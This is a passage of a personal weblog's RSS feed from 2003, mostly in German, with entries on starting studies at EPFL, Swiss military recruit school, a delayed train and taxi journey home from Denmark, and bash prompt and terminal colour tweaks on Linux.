  12120.    <description><![CDATA[Hier j'étais à la journée d'acceuil à l'<a href="http://www.epfl.ch"><b>EPFL</b></a>. Où je commence le 27 octobre mes études en informatique.<br>À la fin de cette journée il y avait une apéro. Est-ce que c'est toujours comme ça?
  12121. ]]></description>
  12122.    <content:encoded><![CDATA[Hier j'étais à la journée d'acceuil à l'<a href="http://www.epfl.ch"><b>EPFL</b></a>. Où je commence le 27 octobre mes études en informatique.<br>À la fin de cette journée il y avait une apéro. Est-ce que c'est toujours comme ça?
  12123. ]]></content:encoded>
  12124.  </item>
  12125.  
  12126.  <item>
  12127.    <title>www.loozer.ch</title>
  12128.    <link>https://blog.x-way.org/Misc/2003/10/12/wwwloozerch.html</link>
  12129.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323975</guid>
  12130.    <dc:creator>Andreas Jaggi</dc:creator>
  12131.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12132.    <pubDate>Sun, 12 Oct 2003 17:23:00 +0000</pubDate>
  12133.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12134.    <description><![CDATA[Erst heute entdeckt: <a href="https://web.archive.org/web/20030807125310/http://www.loozer.ch/"><b>www.loozer.ch</b></a>, die Website von nem Kameraden aus der RS. Dort findet mensch unter anderem interessante Texte zu Verschlüsselung, E-Mail-Verkehr, proprietäre Dateiformate, Datenschutz, Gnu/Linux etc.
  12135. ]]></description>
  12136.    <content:encoded><![CDATA[Erst heute entdeckt: <a href="https://web.archive.org/web/20030807125310/http://www.loozer.ch/"><b>www.loozer.ch</b></a>, die Website von nem Kameraden aus der RS. Dort findet mensch unter anderem interessante Texte zu Verschlüsselung, E-Mail-Verkehr, proprietäre Dateiformate, Datenschutz, Gnu/Linux etc.
  12137. ]]></content:encoded>
  12138.  </item>
  12139.  
  12140.  <item>
  12141.    <title> What kind of thinker are you?</title>
  12142.    <link>https://blog.x-way.org/Misc/2003/09/28/_What_kind_of_thinker_are_you.html</link>
  12143.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323974</guid>
  12144.    <dc:creator>Andreas Jaggi</dc:creator>
  12145.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12146.    <pubDate>Sun, 28 Sep 2003 19:40:00 +0000</pubDate>
  12147.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12148.    <description><![CDATA[<a href="http://www.bbc.co.uk/science/leonardo/thinker_quiz/"><b> What kind of thinker are you?</b></a><br><br>Ich bin ein 'Spatial Thinker', experimetierfreudiger Bastler halt ;-)<br><br>Gesehen bei <a href="http://kniebes.net"><b>mk</b></a>, <a href="http://sec.digigeek.net/"><b>sec</b></a> und <a href="https://web.archive.org/web/20060715140732/http://rw.fuq-u.org/"><b>rw</b></a>
  12149. ]]></description>
  12150.    <content:encoded><![CDATA[<a href="http://www.bbc.co.uk/science/leonardo/thinker_quiz/"><b> What kind of thinker are you?</b></a><br><br>Ich bin ein 'Spatial Thinker', experimetierfreudiger Bastler halt ;-)<br><br>Gesehen bei <a href="http://kniebes.net"><b>mk</b></a>, <a href="http://sec.digigeek.net/"><b>sec</b></a> und <a href="https://web.archive.org/web/20060715140732/http://rw.fuq-u.org/"><b>rw</b></a>
  12151. ]]></content:encoded>
  12152.  </item>
  12153.  
  12154.  <item>
  12155.    <title>Zug Frey in Action</title>
  12156.    <link>https://blog.x-way.org/Misc/2003/09/28/Zug_Frey_in_Action.html</link>
  12157.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323973</guid>
  12158.    <dc:creator>Andreas Jaggi</dc:creator>
  12159.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12160.    <pubDate>Sun, 28 Sep 2003 19:21:00 +0000</pubDate>
  12161.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12162.    <description><![CDATA[Jede Menge Militärphotos und -videos von unserem Zug gibts <a href="https://web.archive.org/web/20031005142639/http://zug-frey.bitron.ch/"><b>hier</b></a>.
  12163. ]]></description>
  12164.    <content:encoded><![CDATA[Jede Menge Militärphotos und -videos von unserem Zug gibts <a href="https://web.archive.org/web/20031005142639/http://zug-frey.bitron.ch/"><b>hier</b></a>.
  12165. ]]></content:encoded>
  12166.  </item>
  12167.  
  12168.  <item>
  12169.    <title>15 min. (Ent)spannung</title>
  12170.    <link>https://blog.x-way.org/Misc/2003/09/22/15_min_Entspannung.html</link>
  12171.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323972</guid>
  12172.    <dc:creator>Andreas Jaggi</dc:creator>
  12173.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12174.    <pubDate>Mon, 22 Sep 2003 12:16:00 +0000</pubDate>
  12175.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12176.    <description><![CDATA[<a href="https://web.archive.org/web/20030907025401/http://www.freshsensation.com/samorost.swf"><b>Flashgame im Mysth-Stil</b></a> gefunden bei <a href="http://www.symlink.ch"><b>symlink.ch</b></a>
  12177. ]]></description>
  12178.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20030907025401/http://www.freshsensation.com/samorost.swf"><b>Flashgame im Mysth-Stil</b></a> gefunden bei <a href="http://www.symlink.ch"><b>symlink.ch</b></a>
  12179. ]]></content:encoded>
  12180.  </item>
  12181.  
  12182.  <item>
  12183.    <title>Closed Air 03</title>
  12184.    <link>https://blog.x-way.org/Music/2003/09/21/Closed_Air_03.html</link>
  12185.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323971</guid>
  12186.    <dc:creator>Andreas Jaggi</dc:creator>
  12187.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12188.    <pubDate>Sun, 21 Sep 2003 23:44:00 +0000</pubDate>
  12189.    <category domain="https://blog.x-way.org/Music">Music</category>
  12190.    <description><![CDATA[Gestern war ich mit ein paar Kameraden ausm Militär <a href="https://web.archive.org/web/20040729134938/http://www.closedair.ch/"><b>hier</b></a> und es war voll geil!
  12191. ]]></description>
  12192.    <content:encoded><![CDATA[Gestern war ich mit ein paar Kameraden ausm Militär <a href="https://web.archive.org/web/20040729134938/http://www.closedair.ch/"><b>hier</b></a> und es war voll geil!
  12193. ]]></content:encoded>
  12194.  </item>
  12195.  
  12196.  <item>
  12197.    <title>Schneewittchen auf türkisch</title>
  12198.    <link>https://blog.x-way.org/Misc/2003/09/14/Schneewittchen_auf_tuerkisch.html</link>
  12199.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323970</guid>
  12200.    <dc:creator>Andreas Jaggi</dc:creator>
  12201.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12202.    <pubDate>Sun, 14 Sep 2003 16:22:00 +0000</pubDate>
  12203.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12204.    <description><![CDATA[Damit hier wieder mal was neues steht: <a href="https://blog.x-way.org/stuff/Schneewittchen.pdf"><b>Schneewittchen auf türkisch</b></a>, geklaut bei <a href="http://vowe.de/"><b>vowe</b></a>.
  12205. ]]></description>
  12206.    <content:encoded><![CDATA[Damit hier wieder mal was neues steht: <a href="https://blog.x-way.org/stuff/Schneewittchen.pdf"><b>Schneewittchen auf türkisch</b></a>, geklaut bei <a href="http://vowe.de/"><b>vowe</b></a>.
  12207. ]]></content:encoded>
  12208.  </item>
  12209.  
  12210.  <item>
  12211.    <title>Grosser Urlaub</title>
  12212.    <link>https://blog.x-way.org/Misc/2003/08/03/Grosser_Urlaub.html</link>
  12213.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323969</guid>
  12214.    <dc:creator>Andreas Jaggi</dc:creator>
  12215.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12216.    <pubDate>Sun, 03 Aug 2003 02:46:00 +0000</pubDate>
  12217.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12218.    <description><![CDATA[So, 'grosser' Urlaub, vom 1.8. 13:30 bis 4.8. 23:45. Ich werde wohl wie schon letztes Wochenende die ganze Zeit schlafen.<br>Mein PC läuft seit dem letzten Samstag auch nur noch mit Knoppix, aber da <a href="http://www.gentoo.org"><b>Gentoo 1.4</b></a> erst am 5.8. rauskommt warte ich noch mit neuaufsetzen.<br><br>Wer Karten, Briefe oder Pakete erhalten will, soll sich melden, aber viel mehr als solche Sprüche sind nicht zu erwarten:<br><br>Wir marschieren über Felder<br>WIr marschieren über Saat<br>Wir verblöden organisiert<br>Und alles zahlt der Staat!<br><br>Ich kenn einen Ort, wo keine Sonne lacht<br>einen Ort wo man aus Menschen Maschinen macht<br>einen Ort ohne Moral und Tugend<br>die <abbr title="Rekrutenschule = Ausbildung zum Soldat">RS</abbr> das Grab deiner Jugend!
  12219. ]]></description>
  12220.    <content:encoded><![CDATA[So, 'grosser' Urlaub, vom 1.8. 13:30 bis 4.8. 23:45. Ich werde wohl wie schon letztes Wochenende die ganze Zeit schlafen.<br>Mein PC läuft seit dem letzten Samstag auch nur noch mit Knoppix, aber da <a href="http://www.gentoo.org"><b>Gentoo 1.4</b></a> erst am 5.8. rauskommt warte ich noch mit neuaufsetzen.<br><br>Wer Karten, Briefe oder Pakete erhalten will, soll sich melden, aber viel mehr als solche Sprüche sind nicht zu erwarten:<br><br>Wir marschieren über Felder<br>WIr marschieren über Saat<br>Wir verblöden organisiert<br>Und alles zahlt der Staat!<br><br>Ich kenn einen Ort, wo keine Sonne lacht<br>einen Ort wo man aus Menschen Maschinen macht<br>einen Ort ohne Moral und Tugend<br>die <abbr title="Rekrutenschule = Ausbildung zum Soldat">RS</abbr> das Grab deiner Jugend!
  12221. ]]></content:encoded>
  12222.  </item>
  12223.  
  12224.  <item>
  12225.    <title>FtS</title>
  12226.    <link>https://blog.x-way.org/Misc/2003/07/20/FtS.html</link>
  12227.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323968</guid>
  12228.    <dc:creator>Andreas Jaggi</dc:creator>
  12229.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12230.    <pubDate>Sun, 20 Jul 2003 14:55:00 +0000</pubDate>
  12231.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12232.    <description><![CDATA[Nach einer Woche im Militär ist die Motivation schon fast in den Minusbereich gefallen, die weiteren 14 Wochen werden sicher lustig :-(<br>Wer die Motivation etwas steigern will, kann mir etwas zuschicken:<br><br>Rekr Jaggi Andreas<br>Kp III Zug 4<br>Uem RS 262<br>Kaserne<br>8302 Kloten<br><br>Bis 5 kg ist das Paket gratis (vermutlich nur in CH), sofern 'Feldpost' draufsteht.
  12233. ]]></description>
  12234.    <content:encoded><![CDATA[Nach einer Woche im Militär ist die Motivation schon fast in den Minusbereich gefallen, die weiteren 14 Wochen werden sicher lustig :-(<br>Wer die Motivation etwas steigern will, kann mir etwas zuschicken:<br><br>Rekr Jaggi Andreas<br>Kp III Zug 4<br>Uem RS 262<br>Kaserne<br>8302 Kloten<br><br>Bis 5 kg ist das Paket gratis (vermutlich nur in CH), sofern 'Feldpost' draufsteht.
  12235. ]]></content:encoded>
  12236.  </item>
  12237.  
  12238.  <item>
  12239.    <title>Bunt</title>
  12240.    <link>https://blog.x-way.org/Linux/2003/07/12/Bunt.html</link>
  12241.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323967</guid>
  12242.    <dc:creator>Andreas Jaggi</dc:creator>
  12243.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12244.    <pubDate>Sat, 12 Jul 2003 13:51:00 +0000</pubDate>
  12245.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12246.    <description><![CDATA[Zurück aus den Ferien, konnte ich endlich einmal wieder vor meinen Computer sitzen *g*<br><a href="https://blog.x-way.org/images/farbig.gif"><b>Dieser Screenshot</b></a> zeigt, was dabei herausgekommen ist:<br><br>- Farbige Terminals <pre>aterm -tr -sh 75 -rv +sb -tint blue</pre>- Farbiger Prompt <pre>PS1='\[\033[1;30m\][ \[\033[01;32m\]\u\[\033[0;37m\] @ \[\033[01;32m\]\h \[\033[0;37m\]: \[\033[01;34m\]\w\[\033[1;30m\] ] \[\033[0;37m\]\$ \[\033[01;00m\]'</pre>- Farbiges ls <pre>alias ls="ls --color=auto"</pre>- Farbtabelle für die Shell: <a href="https://blog.x-way.org/stuff/colors"><b>colors</b></a><br><br>- Informative Titelleisten <pre>PROMPT_COMMAND='echo -ne "\033]2;$USER@$HOSTNAME: $PWD ($_)\007"'</pre>
  12247. ]]></description>
  12248.    <content:encoded><![CDATA[Zurück aus den Ferien, konnte ich endlich einmal wieder vor meinen Computer sitzen *g*<br><a href="https://blog.x-way.org/images/farbig.gif"><b>Dieser Screenshot</b></a> zeigt, was dabei herausgekommen ist:<br><br>- Farbige Terminals <pre>aterm -tr -sh 75 -rv +sb -tint blue</pre>- Farbiger Prompt <pre>PS1='\[\033[1;30m\][ \[\033[01;32m\]\u\[\033[0;37m\] @ \[\033[01;32m\]\h \[\033[0;37m\]: \[\033[01;34m\]\w\[\033[1;30m\] ] \[\033[0;37m\]\$ \[\033[01;00m\]'</pre>- Farbiges ls <pre>alias ls="ls --color=auto"</pre>- Farbtabelle für die Shell: <a href="https://blog.x-way.org/stuff/colors"><b>colors</b></a><br><br>- Informative Titelleisten <pre>PROMPT_COMMAND='echo -ne "\033]2;$USER@$HOSTNAME: $PWD ($_)\007"'</pre>
  12249. ]]></content:encoded>
  12250.  </item>
  12251.  
  12252.  <item>
  12253.    <title>Ferien zum 2. und '3.' (RS), Zukunft</title>
  12254.    <link>https://blog.x-way.org/Misc/2003/07/05/Ferien_zum_2_und_3_RS_Zukunft.html</link>
  12255.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323966</guid>
  12256.    <dc:creator>Andreas Jaggi</dc:creator>
  12257.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12258.    <pubDate>Sat, 05 Jul 2003 00:12:00 +0000</pubDate>
  12259.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12260.    <description><![CDATA[Nachdem ich erst gerade aus Dänemark zurück bin, fahre ich in etwa 4 Stunden mit meiner Familie für eine Woche in die Ferien nach Brüssel. Gerade anschliessend beginnt dann die Rekrutenschule, welche am 24. Oktober endet. Am 20 Oktober beginnt das Studium an der <a href="http://www.epfl.ch/"><b>EPFL</b></a>, verpasse ich also schon zum Anfang was :-(
  12261. ]]></description>
  12262.    <content:encoded><![CDATA[Nachdem ich erst gerade aus Dänemark zurück bin, fahre ich in etwa 4 Stunden mit meiner Familie für eine Woche in die Ferien nach Brüssel. Gerade anschliessend beginnt dann die Rekrutenschule, welche am 24. Oktober endet. Am 20 Oktober beginnt das Studium an der <a href="http://www.epfl.ch/"><b>EPFL</b></a>, verpasse ich also schon zum Anfang was :-(
  12263. ]]></content:encoded>
  12264.  </item>
  12265.  
  12266.  <item>
  12267.    <title>Guide to GNU/Linux Desktop Survival</title>
  12268.    <link>https://blog.x-way.org/Linux/2003/07/04/Guide_to_GNULinux_Desktop_Survival.html</link>
  12269.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323965</guid>
  12270.    <dc:creator>Andreas Jaggi</dc:creator>
  12271.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12272.    <pubDate>Fri, 04 Jul 2003 11:03:00 +0000</pubDate>
  12273.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12274.    <description><![CDATA[Dank <a href="http://www.togaware.com/linux/survivor/index.html"><b>diesem reichhaltigen Guide</b></a> habe ich es wieder geschafft, meinen Drucker zum Laufen zu bringen, nachdem ich es, wegen der nicht gemachten Dokumentation vom letzten mal, nochnicht geschafft hatte.
  12275. ]]></description>
  12276.    <content:encoded><![CDATA[Dank <a href="http://www.togaware.com/linux/survivor/index.html"><b>diesem reichhaltigen Guide</b></a> habe ich es wieder geschafft, meinen Drucker zum Laufen zu bringen, nachdem ich es, wegen der nicht gemachten Dokumentation vom letzten mal, nochnicht geschafft hatte.
  12277. ]]></content:encoded>
  12278.  </item>
  12279.  
  12280.  <item>
  12281.    <title>back @ home</title>
  12282.    <link>https://blog.x-way.org/Misc/2003/07/01/back__home.html</link>
  12283.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323964</guid>
  12284.    <dc:creator>Andreas Jaggi</dc:creator>
  12285.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12286.    <pubDate>Tue, 01 Jul 2003 23:10:00 +0000</pubDate>
  12287.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12288.    <description><![CDATA[So, ich bin zurück aus Dänemark. Es war schön und hatte sogar genügend Sonne, dass ich mir nen Sonnenbrand geholt habe.<br>Besonders die 21-stündige Rückreise war sehr abenteuerlich, da bei wirklich jedem Umsteigen alle Züge Verspätung hatten...
  12289. <br><br>
  12290. <img src="https://blog.x-way.org/images/karte.png" width="300" height="300" alt="Karte von Dänemark und Deutschland"><br><br>Unsere Rückreise startete ganz normal mit einer einstündigen Busfahrt von Faaborg nach Odense (14.04 bis ca. 15.00). In Odense sollte unser Zug um 16.04 fahren, damit wir in Kollding in den IC nach Hamburg wechseln konnten.<br>Jedoch erfahren wir in Odense etwas vor 16 Uhr eher zufällig, dass der Zug nach Kollding so viel Verspätung hat, dass wir den IC nach Hamburg nicht mehr erreichen können. Unser erster Gedanke: Scheisse, nächster Zug erst in 24 Stunden.<br>Da aber noch andere Passagiere in dieser Situation waren, hat ein dänischer "Reiseleiter" (er begleitete zwei Jugendliche aus Ohaio an den Bahnhof) mit dem Bahnpersonal ausgehandelt, dass die Dänische Bahn ein Taxi bezahlt, das uns bis nach Kollding bringt, damit wir den IC nach Hamburg noch erreichen.<br>Gut, das Taxi kommt, mittlerweile ist es schon 16.22 und der IC in Kollding fährt um 16.47. Der Taxifahrer hat folgende Anweisung bekommen: 'Drive like hell!' und wir sind losgefahren.<br>Als wir erst um ungefähr 17 Uhr in der Nähe von Kollding sind, entscheidet der Taxifahrer, dass wir zur nächsten Station fahren, wo der IC hält, Flensburg (etwa 200km von Odense entfernt). Wir fahren nach Flensburg und haben dort etwa 10 Minuten vorsprung auf den Zug. Jedoch entscheidet der Taxifahrer weiterzufahren, da es vermutlich nicht möglich ist, in 10 Minuten von der Autobahn bis zum Bahnhof zu gelangen, und wenn wir dann dort wären und den Zug verpasst hätten, so müssten wir noch viel mehr Zeit aufholen.<br>Also rasen wir weiter, über die Grenze, wo der Taxifahrer feststellt, dass er das erste mal mit dem Taxi in Deutschland ist. Nächstes Ziel ist Hamburg (etwa 180 km von Flensburg entfernt). Dort würde unser nächster Zug (CityNightLiner nach Zürich) um 20.19 fahren.<br>Als wir auf Neumünster zufahren, haben wir 25 Minuten Vorsprung auf den Zug und der Taxifahrer entscheidet, hier zum Bahnhof zu fahren anstatt sich in Hamburg durch das städtische Verkehrschaos zu zwängen. Mittlerweile ist es fast 19 Uhr. Wir sind nun schon 3 Stunden Taxi gefahren, die Dänische Bahn wird sich sicher über die Rechnung freuen *bg*<br>Wir finden den Bahnhof ziemlich leicht und die Leute staunen nicht schlecht, als sie ein dänisches Taxi sehen *g*<br>Mit ein paar Minuten Verspätung fährt der dänische IC dann ein und wir steigen endlich in den Zug ein, in dem wir schon seit 2,5 Stunden sein sollten.<br>Mit einer kleinen Verspätung kommen wir in Hamburd-Dammtor an, was jedoch nicht weiter schlimm ist, da wir dort sowiese eine halbe Stunde Aufenthalt hätten.<br>Um 20.24 kommt der CityNightLiner mit 5 Minuten Verspätung, die sich noch vergrössern werden. Wir beziehen unsere Sleeperette (= Liegesessel) und freuen uns, dass wir uns endlich etwas erholen können :-)<br>Die Zugfahrt quer durch Deutschland verläuft wortwörtlich wie im Schlaf *g*<br>Als wir  jedoch am Morgen aufwachen kommt der Zug mit 20 Minuten Verspätung um 7.16 anstatt umd 6.56 in Basel an und wir verpassen unseren Zug, der um 7.04 gefahren ist.<br>Nach einer Stunde rumhängen im Bahnhof Basel, nehmen wir den Zug um 8.04 Richtung Bern, Thun, Spiez, Interlaken.<br>Um 9.58 steige ich in Spiez aus dem Zug aus und warte auf meinen Anschlusszug der um 10.02 fahren sollte. Als um 10.03 immernoch kein Zug da ist, höre ich die Durchsage: "Der Goldenpass Express nach Zweisimmen, planmässige Abfahrt 10.02 folgt in circa 5 Minuten"<br>Nach etwa 10 Minuten kommt der Zug und ich beginne auch die letzte Etape meiner Heimreise. In Zweisimmen komme ich schliesslich mit 15 Minuten Verspätung um 10.55 an, was mir jedoch nichts mehr ausmacht, da ich keine weiteren Anschlusszüge erreichen muss und nach 21 Stunden reisen sowieso nur noch in Bett fallen kann ;-)
  12291. ]]></description>
  12292.    <content:encoded><![CDATA[So, ich bin zurück aus Dänemark. Es war schön und hatte sogar genügend Sonne, dass ich mir nen Sonnenbrand geholt habe.<br>Besonders die 21-stündige Rückreise war sehr abenteuerlich, da bei wirklich jedem Umsteigen alle Züge Verspätung hatten...
  12293. <br><br>
  12294. <img src="https://blog.x-way.org/images/karte.png" width="300" height="300" alt="Karte von Dänemark und Deutschland"><br><br>Unsere Rückreise startete ganz normal mit einer einstündigen Busfahrt von Faaborg nach Odense (14.04 bis ca. 15.00). In Odense sollte unser Zug um 16.04 fahren, damit wir in Kollding in den IC nach Hamburg wechseln konnten.<br>Jedoch erfahren wir in Odense etwas vor 16 Uhr eher zufällig, dass der Zug nach Kollding so viel Verspätung hat, dass wir den IC nach Hamburg nicht mehr erreichen können. Unser erster Gedanke: Scheisse, nächster Zug erst in 24 Stunden.<br>Da aber noch andere Passagiere in dieser Situation waren, hat ein dänischer "Reiseleiter" (er begleitete zwei Jugendliche aus Ohaio an den Bahnhof) mit dem Bahnpersonal ausgehandelt, dass die Dänische Bahn ein Taxi bezahlt, das uns bis nach Kollding bringt, damit wir den IC nach Hamburg noch erreichen.<br>Gut, das Taxi kommt, mittlerweile ist es schon 16.22 und der IC in Kollding fährt um 16.47. Der Taxifahrer hat folgende Anweisung bekommen: 'Drive like hell!' und wir sind losgefahren.<br>Als wir erst um ungefähr 17 Uhr in der Nähe von Kollding sind, entscheidet der Taxifahrer, dass wir zur nächsten Station fahren, wo der IC hält, Flensburg (etwa 200km von Odense entfernt). Wir fahren nach Flensburg und haben dort etwa 10 Minuten vorsprung auf den Zug. Jedoch entscheidet der Taxifahrer weiterzufahren, da es vermutlich nicht möglich ist, in 10 Minuten von der Autobahn bis zum Bahnhof zu gelangen, und wenn wir dann dort wären und den Zug verpasst hätten, so müssten wir noch viel mehr Zeit aufholen.<br>Also rasen wir weiter, über die Grenze, wo der Taxifahrer feststellt, dass er das erste mal mit dem Taxi in Deutschland ist. Nächstes Ziel ist Hamburg (etwa 180 km von Flensburg entfernt). Dort würde unser nächster Zug (CityNightLiner nach Zürich) um 20.19 fahren.<br>Als wir auf Neumünster zufahren, haben wir 25 Minuten Vorsprung auf den Zug und der Taxifahrer entscheidet, hier zum Bahnhof zu fahren anstatt sich in Hamburg durch das städtische Verkehrschaos zu zwängen. Mittlerweile ist es fast 19 Uhr. Wir sind nun schon 3 Stunden Taxi gefahren, die Dänische Bahn wird sich sicher über die Rechnung freuen *bg*<br>Wir finden den Bahnhof ziemlich leicht und die Leute staunen nicht schlecht, als sie ein dänisches Taxi sehen *g*<br>Mit ein paar Minuten Verspätung fährt der dänische IC dann ein und wir steigen endlich in den Zug ein, in dem wir schon seit 2,5 Stunden sein sollten.<br>Mit einer kleinen Verspätung kommen wir in Hamburd-Dammtor an, was jedoch nicht weiter schlimm ist, da wir dort sowiese eine halbe Stunde Aufenthalt hätten.<br>Um 20.24 kommt der CityNightLiner mit 5 Minuten Verspätung, die sich noch vergrössern werden. Wir beziehen unsere Sleeperette (= Liegesessel) und freuen uns, dass wir uns endlich etwas erholen können :-)<br>Die Zugfahrt quer durch Deutschland verläuft wortwörtlich wie im Schlaf *g*<br>Als wir  jedoch am Morgen aufwachen kommt der Zug mit 20 Minuten Verspätung um 7.16 anstatt umd 6.56 in Basel an und wir verpassen unseren Zug, der um 7.04 gefahren ist.<br>Nach einer Stunde rumhängen im Bahnhof Basel, nehmen wir den Zug um 8.04 Richtung Bern, Thun, Spiez, Interlaken.<br>Um 9.58 steige ich in Spiez aus dem Zug aus und warte auf meinen Anschlusszug der um 10.02 fahren sollte. Als um 10.03 immernoch kein Zug da ist, höre ich die Durchsage: "Der Goldenpass Express nach Zweisimmen, planmässige Abfahrt 10.02 folgt in circa 5 Minuten"<br>Nach etwa 10 Minuten kommt der Zug und ich beginne auch die letzte Etape meiner Heimreise. In Zweisimmen komme ich schliesslich mit 15 Minuten Verspätung um 10.55 an, was mir jedoch nichts mehr ausmacht, da ich keine weiteren Anschlusszüge erreichen muss und nach 21 Stunden reisen sowieso nur noch in Bett fallen kann ;-)
  12295. ]]></content:encoded>
  12296.  </item>
  12297.  
  12298.  <item>
  12299.    <title>Dänemark ich komme</title>
  12300.    <link>https://blog.x-way.org/Misc/2003/06/20/Daenemark_ich_komme.html</link>
  12301.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323962</guid>
  12302.    <dc:creator>Andreas Jaggi</dc:creator>
  12303.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12304.    <pubDate>Fri, 20 Jun 2003 12:20:00 +0000</pubDate>
  12305.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12306.    <description><![CDATA[Wie gi <a href="https://web.archive.org/web/20030625203216/http://360degrees.gmgn.de/?action=comment&amp;newsid=88"><b>neulich</b></a>, starte ich auch ne grosse Postkartenaktion *g*<br>Wer also ne Karte will, soll mir bis 14 Uhr seine Adresse mitteilen (die ohne http:// ;-)
  12307. ]]></description>
  12308.    <content:encoded><![CDATA[Wie gi <a href="https://web.archive.org/web/20030625203216/http://360degrees.gmgn.de/?action=comment&amp;newsid=88"><b>neulich</b></a>, starte ich auch ne grosse Postkartenaktion *g*<br>Wer also ne Karte will, soll mir bis 14 Uhr seine Adresse mitteilen (die ohne http:// ;-)
  12309. ]]></content:encoded>
  12310.  </item>
  12311.  
  12312.  <item>
  12313.    <title>Maturareise</title>
  12314.    <link>https://blog.x-way.org/School/2003/06/19/Maturareise.html</link>
  12315.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323961</guid>
  12316.    <dc:creator>Andreas Jaggi</dc:creator>
  12317.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12318.    <pubDate>Thu, 19 Jun 2003 22:24:00 +0000</pubDate>
  12319.    <category domain="https://blog.x-way.org/School">School</category>
  12320.    <description><![CDATA[Morgen um 16.18 Uhr fahre ich mit meiner Klasse nach Dänemark auf die Maturareise.<br>Ich melde mich dann im Juli wieder :-)
  12321. ]]></description>
  12322.    <content:encoded><![CDATA[Morgen um 16.18 Uhr fahre ich mit meiner Klasse nach Dänemark auf die Maturareise.<br>Ich melde mich dann im Juli wieder :-)
  12323. ]]></content:encoded>
  12324.  </item>
  12325.  
  12326.  <item>
  12327.    <title>dumdidum</title>
  12328.    <link>https://blog.x-way.org/Networking/2003/06/16/dumdidum.html</link>
  12329.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323960</guid>
  12330.    <dc:creator>Andreas Jaggi</dc:creator>
  12331.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12332.    <pubDate>Mon, 16 Jun 2003 02:18:00 +0000</pubDate>
  12333.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  12334.    <description><![CDATA[Da hab ich nun mit nem 486 nen superleisen 'Server' gebastelt und kaum den Apache installiert und alles eingerichtet, schon sieht's im accesslog so aus:<br><br>
  12335. 192.168.23.6 - - [15/Jun/2003:17:58:38 +0200] "GET / HTTP/1.1" 200 71 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4b) Gecko/20030605 Mozilla Firebird/0.6"<br>(Mein erster Zugriff, davon hats natürlich noch n paar mehr *g*)
  12336. <br><br>
